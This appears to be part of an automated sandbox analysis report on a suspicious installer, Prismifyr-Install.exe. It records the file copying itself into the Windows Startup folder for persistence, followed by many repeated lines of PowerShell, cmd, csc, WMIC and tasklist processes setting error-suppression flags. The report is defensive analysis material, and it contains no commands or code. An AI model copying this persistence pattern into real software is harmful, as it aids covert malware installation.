      Source: C:\Users\user\Desktop\Prismifyr-Install.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe\:Zone.Identifier:$DATAJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
